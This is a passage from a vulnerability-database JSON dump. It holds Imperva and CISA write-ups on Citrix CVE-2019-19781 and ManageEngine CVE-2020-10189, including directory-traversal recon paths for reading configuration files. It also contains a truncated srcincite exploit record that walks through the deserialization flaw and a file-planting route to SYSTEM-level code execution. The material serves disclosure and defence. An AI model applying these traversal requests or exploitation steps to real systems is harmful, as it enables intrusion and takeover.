"SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652"], "modified": "2019-02-04T00:00:00", "id": "CPAI-2019-0073", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2021-04-22T20:29:34", "description": "In [Part 1](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>) of this series, we explained how and why our software supply chain transfers an extraordinary amount of risk downstream to the organizations and users that trust and depend on it. We also presented evidence suggesting that 2021 may well be the year of the [Software Supply Chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>).\n\nLast time we described the most sophisticated of the supply chain attack methods, a [Vendor Compromise](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>). In this post, we cover the exploitation of third-party applications.\n\n### Exploitation of Third Party Applications\n\nAttacks targeting "[zero-days](<https://www.imperva.com/learn/application-security/zero-day-exploit/>)," or unpatched security bugs, in commonly used third-party applications are another example of the risks we assume from our software supply chain.\n\nCreating software is a challenging process. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don\u2019t typically cause catastrophic system failures. They simply allow a bad actor to make the software do things it wasn\u2019t intended to do like steal other users\u2019 credentials or read the entire contents of a database.\n\nThe [recent attacks on the Microsoft Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell. A web shell is typically an additional web page that the attacker uploads to a website. If the attacker can modify a web page on the server, the web shell may be embedded in an existing page. The additional or modified page contains code that allows the attacker to run arbitrary Operating System commands on the webserver, read files in the filesystem, install malware, etc. A web shell offers capabilities similar to a backdoor without having to establish an additional network connection to the webserver.\n\nCompounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. It\u2019s rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Employing a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) to reduce the gap is a common strategy. Even the best WAFs require time to adapt, however, either with a new signature update (that must be developed, tested, and deployed) or with an adjustment to a machine learning model, or manual acknowledgment that an anomaly has been detected and should be blocked in the future. Additionally, these \u201cvirtual patches\u201d must be tested in each organizations\u2019 environment prior to deployment to ensure they don\u2019t cause unwanted side effects.\n\nThe race to mitigate zero-day attacks through traditional means is increasingly difficult to win. For example, a Zoho ManageEngine Desktop Server zero-day vulnerability [was broadly exploited within days](<https://www.tenable.com/blog/cve-2020-10189-deserialization-vulnerability-in-zoho-manageengine-desktop-central-10-patched>) of its public disclosure.\n\n### Imperva RASP\n\nImperva [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a compelling way forward. Delivered as a lightweight software plugin, RASP attaches to virtually any type of application whether a third party, open-source or bespoke. Tightly coupled with the application and requiring no external connectivity, RASP protections are consistently applied regardless of where the application is deployed today or in the future. Using a positive security approach, RASP mitigates risk from supply chain attacks by neutralizing malicious software activity including unauthorized network calls, file system access, and execution of commands on the underlying host operating system.\n\nPerhaps this is why the National Institute of Standards and Technology recommends the use of RASP in Special Publication 800-53, section SI-7(17), [Security and Privacy Controls for Information Systems and Organizations](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf>)?\n\nSee [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) for yourself.\n\nThe post [5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-22T12:28:49", "type": "impervablog", "title": "5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-04-22T12:28:49", "id": "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "href": "https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-19T15:26:21", "description": "On December 17, Citrix issued a [Security Bulletin](<https://support.citrix.com/article/CTX267027>) on an unauthenticated remote code execution vulnerability (CVE-2019-19781) affecting its Citrix Application Delivery Controller (ADC) - formerly known as NetScaler ADC - and its Citrix Gateway - formerly known as NetScaler Gateway.\n\nAt the time of the security bulletin release, there was no official information available on what the exact vulnerability was, although Citrix did [release Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) which shed some light on how the vulnerability was exploited. \nThe mitigation offered was to create a responder policy that would prevent HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL which would trigger a 403 response code.\n\nAt that point it was assumed the vulnerability would most likely take advantage of some sort of directory traversal flaw to upload malicious files to the /vpns/ path, leading to remote code execution. We created several research rules to detect HTTP requests to the suspicious path, but weren\u2019t able to capture any kind of malicious requests at that time.\n\nOn January 3, the [SANS Internet Storm Center (ISC) tweeted](<https://twitter.com/sans_isc/status/1213228049011007489>) that they\u2019d observed the \u201cfirst exploit attempt\u201d for this vulnerability in the wild, although they didn\u2019t include any additional details. At that point in time, no malicious requests were detected on any sites protected by Imperva.\n\nFrom January 7 onwards, several blog posts were published that gradually started to reveal the nature of the attack, until a POC and exploit was published on January 10.\n\nYou can read an in depth analysis of the vulnerability [here](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>) and [here](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>).\n\nAs attack activity rose immediately following the release of the POC/exploits, we found that the first stage of the attack was blocked out-of-the-box using existing directory traversal signatures - thus Imperva provided a mitigation for a zero day exploit.\n\nIn addition, the research rules that were set up prior to the POC/exploits both detected and blocked the second stage of the attack. What\u2019s more, they were able to block recon attempts by attackers trying to detect vulnerable Citrix ADC/GW by directly accessing the following paths, in an effort to retrieve the \u2018smb.conf\u2019 configuration file or reach the writeable script \u2018newbm.pl\u2019:\n\n * /vpns/\n * /vpn/../vpns/cfg/smb.conf\n * /vpn/../vpns/portal/scripts/newbm.pl\n\nFrom that point onwards we saw a surge in attack attempts on sites protected by Imperva, as shown in the graphs below:\n\nAfter the two initial exploits were published - a simple Bash script and a more detailed Python script - numerous other variations of the exploit appeared in several GitHub repositories. Below we can see the spread of various clients that were identified based on client verification tests, as sources of exploitation and scanning attempts on Imperva-protected sites:\n\nFrom the graph above we can see that, from January 11 onwards, most exploit attempts were executed using the Bash script - this was identified by cURL User-Agent as the script uses cURL to send the malicious request - followed by the Python scripts (there were two variations of the exploit, one using the Python urllib library, the other using the python-requests library).\n\nIn the last 24 hours (at the time of writing this post) we also noticed a sudden increase in requests from various vulnerability scanners, mainly WhiteHat Vulnerability Scanner.\n\nBelow you can see the amount of Imperva-protected sites targeted since the exploit attempts were detected in the wild, and the total number of sites attacked: \n\n\nAt the end of the day, our customers were protected right out-of-the-box in the Cloud and the On-prem WAF. The Threat Research team will keep tracking this and other zero-day vulnerabilities and their exploits, as well as constantly updating our WAF engine to provide the best mitigation to newly released vulnerabilities.\n\nThe post [Imperva Mitigates Exploits of Citrix Vulnerability - Right Out of the Box](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-19T15:00:50", "type": "impervablog", "title": "Imperva Mitigates Exploits of Citrix Vulnerability \u2013 Right Out of the Box", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-19T15:00:50", "id": "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "href": "https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:49", "description": "Zoho has released a security update on a vulnerability (CVE-2020-10189) affecting ManageEngine Desktop Central build 10.0.473 and below. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to control servers, laptops, smartphones, and tablets from a central location.\n\nThe Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the [Zoho security update](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for more information and apply the [patch](<https://www.manageengine.com/products/desktop-central/service-packs.html>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update on ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:51", "description": "Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. Citrix plans to begin releasing security updates for affected software starting January 20, 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:\n\n * Review the Citrix article on [updates on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/>), published January 17, 2020;\n * See Citrix Security Bulletin [CTX267027 \u2013 Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027>);\n * Apply the recommended mitigations in [CTX267679 \u2013 Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>); and\n * Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T00:00:00", "type": "cisa", "title": "Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T00:00:00", "id": "CISA:134C272F26FB005321448C648224EB02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:54", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released a [utility](<https://github.com/cisagov/check-cve-2019-19781>) that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability. According to Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>), beginning on January 20, 2020, Citrix will be releasing new versions of Citrix ADC and Citrix Gateway that will patch CVE-2019-19781.\n\nCISA strongly advises affected organizations to review CERT/CC\u2019s Vulnerability Note [VU#619785](<https://www.kb.cert.org/vuls/id/619785/>) and Citrix Security Bulletin [CTX267027 ](<https://support.citrix.com/article/CTX267027>)and apply the mitigations until Citrix releases new versions of the software.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T00:00:00", "type": "cisa", "title": "CISA Releases Test for Citrix ADC and Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "CISA:661993843C9F9A838ADA8B8B8B9412D1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:50", "description": "Citrix has released security updates to address the CVE-2019-19781 vulnerability in Citrix SD-WAN WANOP. An attacker could exploit this vulnerability to take control of an affected system. Citrix has also released an Indicators of Compromise Scanner that aims to identify evidence of successful exploitation of CVE-2019-19781.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends users and administrators review the Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>) and apply the necessary updates. CISA also recommends users and administrators:\n\n * Run the [Indicators of Compromise Scanner](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>);\n * Review the Citrix article on [CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>), published January 23, 2020; and\n * Review CISA\u2019s Activity Alert on [Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://www.us-cert.gov/ncas/alerts/aa20-020a>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T00:00:00", "type": "cisa", "title": "Citrix Releases Security Updates for SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-23T00:00:00", "id": "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "srcincite": [{"lastseen": "2022-04-20T17:15:52", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the FileStorage class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.\n\n**Affected Vendors:**\n\nManageEngine\n\n**Affected Products:**\n\nDesktop Central\n\n**Vendor Response:**\n\nManageEngine has issued an update to correct this vulnerability. More details can be found at: \n<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T00:00:00", "type": "srcincite", "title": "SRC-2020-0011 : ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "SRC-2020-0011", "href": "https://srcincite.io/advisories/src-2020-0011/", "sourceData": "#!/usr/bin/env python3\n\"\"\"\nManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability\n\nDownload: https://www.manageengine.com/products/desktop-central/download-free.html\nFile ...: ManageEngine_DesktopCentral_64bit.exe\nSHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826\nFound by: mr_me\nDate ...: 2019-12-12\nCVE ....: CVE-2020-10189\nClass ..: CWE-502\nCVSS ...: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)\nPatch ..: https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n\n## Summary:\n\nAn unauthenticated attacker can reach a Deserialization of Untrusted Data vulnerability that can allow them to execute arbitrary code as SYSTEM/root.\n\n## Vulnerability Analysis:\n\nIn the web.xml file, we can see one of the default available servlets is the `CewolfServlet` servlet.\n\n```CewolfServletde.laures.cewolf.CewolfRendererdebugfalseoverliburl/js/overlib.jsstoragede.laures.cewolf.storage.FileStorage1...CewolfServlet/cewolf/*```\n\nThis servlet, contains the following code:\n\n```\n protected void doGet(HttpServletRequest request, HttpServletResponse response)\n throws ServletException, IOException {\n if (debugged) {\n logRequest(request);\n }\n addHeaders(response);\n if ((request.getParameter(\"state\") != null) || (!request.getParameterNames().hasMoreElements())) {\n requestState(response);\n return;\n }\n int width = 400;\n int height = 400;\n boolean removeAfterRendering = false;\n if (request.getParameter(\"removeAfterRendering\") != null) {\n removeAfterRendering = true;\n }\n if (request.getParameter(\"width\") != null) {\n width = Integer.parseInt(request.getParameter(\"width\"));\n }\n if (request.getParameter(\"height\") != null) {\n height = Integer.parseInt(request.getParameter(\"height\"));\n }\n if (!renderingEnabled) {\n renderNotEnabled(response, 400, 50);\n return;\n }\n if ((width > config.getMaxImageWidth()) || (height > config.getMaxImageHeight())) {\n renderImageTooLarge(response, 400, 50);\n return;\n }\n String imgKey = request.getParameter(\"img\"); // 1\n if (imgKey == null) {\n logAndRenderException(new ServletException(\"no 'img' parameter provided for Cewolf servlet.\"), response,\n width, height);\n return;\n }\n Storage storage = config.getStorage();\n ChartImage chartImage = storage.getChartImage(imgKey, request); // 2\n```\n\nAt [1] the code sets the `imgKey` variable using the GET parameter `img`. Later at [2], the code then calls the `storage.getChartImage` method with the attacker supplied `img`. You maybe wondering what class the `storage` instance is. This was mapped as an initializing parameter to the servlet code in the web.xml file:\n\n```storagede.laures.cewolf.storage.FileStorage```\n\n```\npublic class FileStorage implements Storage {\n static final long serialVersionUID = -6342203760851077577L;\n String basePath = null;\n List stored = new ArrayList();\n private boolean deleteOnExit = false;\n\n //...\n\n public void init(ServletContext servletContext) throws CewolfException {\n basePath = servletContext.getRealPath(\"/\");\n Configuration config = Configuration.getInstance(servletContext);\n deleteOnExit = \"true\".equalsIgnoreCase(\"\" + (String) config.getParameters().get(\"FileStorage.deleteOnExit\"));\n servletContext.log(\"FileStorage initialized, deleteOnExit=\" + deleteOnExit);\n }\n\n //...\n\n private String getFileName(String id) {\n return basePath + \"_chart\" + id; // 4\n }\n\n //...\n\n public ChartImage getChartImage(String id, HttpServletRequest request) {\n ChartImage res = null;\n ObjectInputStream ois = null;\n try {\n ois = new ObjectInputStream(new FileInputStream(getFileName(id))); // 3\n res = (ChartImage) ois.readObject(); // 5\n ois.close();\n } catch (Exception ex) {\n ex.printStackTrace();\n } finally {\n if (ois != null) {\n try {\n ois.close();\n } catch (IOException ioex) {\n ioex.printStackTrace();\n }\n }\n }\n return res;\n }\n```\n\nAt [3] the code calls `getFileName` using the attacker controlled `id` GET parameter which returns a path to a file on the filesystem using `basePath`. This field is set in the `init` method of the servlet. On the same line, the code creates a new `ObjectInputStream` instance from the supplied filepath via `FileInputStream`. This path is attacker controlled at [4], however, there is no need to (ab)use traversals here for exploitation.\n\nThe most important point is that at [5] the code calls `readObject` using the contents of the file without any further lookahead validation.\n\n## Exploitation:\n\nFor exploitation, an attacker can (ab)use the `MDMLogUploaderServlet` servlet to plant a file on the filesystem with controlled content inside. Here is the corresponding web.xml entry:\n\n```MDMLogUploaderServletcom.me.mdm.onpremise.webclient.log.MDMLogUploaderServlet...MDMLogUploaderServlet/mdm/mdmLogUploader/mdm/client/v1/mdmLogUploader```\n\n```\npublic class MDMLogUploaderServlet extends DeviceAuthenticatedRequestServlet {\n private Logger logger = Logger.getLogger(\"MDMLogger\");\n private Long customerID;\n private String deviceName;\n private String domainName;\n private Long resourceID;\n private Integer platformType;\n private Long acceptedLogSize = Long.valueOf(314572800L);\n\n public void doPost(HttpServletRequest request, HttpServletResponse response, DeviceRequest deviceRequest)\n throws ServletException, IOException {\n Reader reader = null;\n PrintWriter printWriter = null;\n\n logger.log(Level.WARNING, \"Received Log from agent\");\n\n Long nDataLength = Long.valueOf(request.getContentLength());\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : file conentent lenght is {0}\", nDataLength);\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet :Acceptable file conentent lenght is {0}\", acceptedLogSize);\n try {\n if (nDataLength.longValue() <= acceptedLogSize.longValue()) {\n String udid = request.getParameter(\"udid\"); // 1\n String platform = request.getParameter(\"platform\");\n String fileName = request.getParameter(\"filename\"); // 2\n HashMap deviceMap = MDMUtil.getInstance().getDeviceDetailsFromUDID(udid);\n if (deviceMap != null) {\n customerID = ((Long) deviceMap.get(\"CUSTOMER_ID\"));\n deviceName = ((String) deviceMap.get(\"MANAGEDDEVICEEXTN.NAME\"));\n domainName = ((String) deviceMap.get(\"DOMAIN_NETBIOS_NAME\"));\n resourceID = ((Long) deviceMap.get(\"RESOURCE_ID\"));\n platformType = ((Integer) deviceMap.get(\"PLATFORM_TYPE\"));\n } else {\n customerID = Long.valueOf(0L);\n deviceName = \"default\";\n domainName = \"default\";\n }\n String baseDir = System.getProperty(\"server.home\");\n\n deviceName = removeInvalidCharactersInFileName(deviceName);\n\n String localDirToStore = baseDir + File.separator + \"mdm-logs\" + File.separator + customerID\n + File.separator + deviceName + \"_\" + udid; // 3\n\n File file = new File(localDirToStore);\n if (!file.exists()) {\n file.mkdirs(); // 4\n }\n logger.log(Level.WARNING, \"absolute Dir {0} \", new Object[]{localDirToStore});\n\n fileName = fileName.toLowerCase();\n if ((fileName != null) && (FileUploadUtil.hasVulnerabilityInFileName(fileName, 